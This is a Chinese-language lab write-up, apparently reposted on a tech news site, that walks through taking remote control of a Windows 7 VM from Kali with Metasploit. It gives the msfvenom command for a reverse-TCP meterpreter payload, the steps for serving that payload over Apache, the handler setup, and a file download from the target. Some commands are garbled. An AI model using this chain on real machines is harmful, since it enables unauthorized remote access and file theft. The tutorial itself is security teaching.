【简单远程控制】 Metasploit应用

编程入门 行业动态 更新时间:2024-10-23 22:27:20

【简单<a href=https://www.elefans.com/category/jswz/34/1768128.html style=远程控制】 Metasploit应用"/>

【简单远程控制】 Metasploit应用

文章目录

  • 一、实验环境
  • 二、实验内容
    • 1、生成主控端、被控端。
    • 2、获得靶机(Windows)控制权。
    • 3、下载靶机上任意一个文件。
  • 三、实验步骤

一、实验环境

kali虚拟机,靶机win7,(都为NAT模式)

二、实验内容

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

三、实验步骤

(1)在kali生成被控端
打开kali终端输入命令,在本地生成攻击荷载

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.47.128 lport=5000 -f exe -o /root/payload.exe



生成完毕,在将该荷载放到目标靶机上,此时kali就是主控端,靶机是被控端。
PS:在把荷载复制到目标靶机上的时候,可以先把它移动到主机,在从主机移动到靶机;也可以在kali搭建一个网站,将下载链接挂上去,再用靶机去访问这个网站,从而下载下来。(记录一下第二个方法的步骤)
①先在终端查看荷载的存放位置,输入命令ls;

②将荷载的目录地址复制过来,挂到网页上,文件名是 1.exe

命令:cd ./payload/var/www/html/1.exe


③输入命令:

service apache2 start
service apache2 status
cd /var/www/html
ls


④在kali的浏览器里输入环回地址:127.0.0.1/1.exe

⑤最后去靶机的浏览器输入命令:192.168.47.128/1.exe 即可下载

(2)获得靶机(Windows)的控制权
1.打开kali终端,输入msfconsole命令即可打开Metasploit

2.使用攻击模块
输入命令:

 use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.47.128set lport 5000exploit


3.然后打开靶机,多次点击攻击荷载,此时kali已经开始监听靶机的行为,我们从网上下载一张图片,下载了以后,在kali也会出现靶机所下载的内容


(3)下载靶机上的任一文件
1.我们直接下载刚刚靶机下载的那种图片即可,输入download命令

2.最后打开kali的文件夹,输入下载的图片的存放目录/home/,找到了靶机下载的那张图片,我们已经将他下载下来,复现完毕!

更多推荐

【简单远程控制】 Metasploit应用

本文发布于:2023-06-28 16:45:54,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/930533.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:远程控制   简单   Metasploit

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!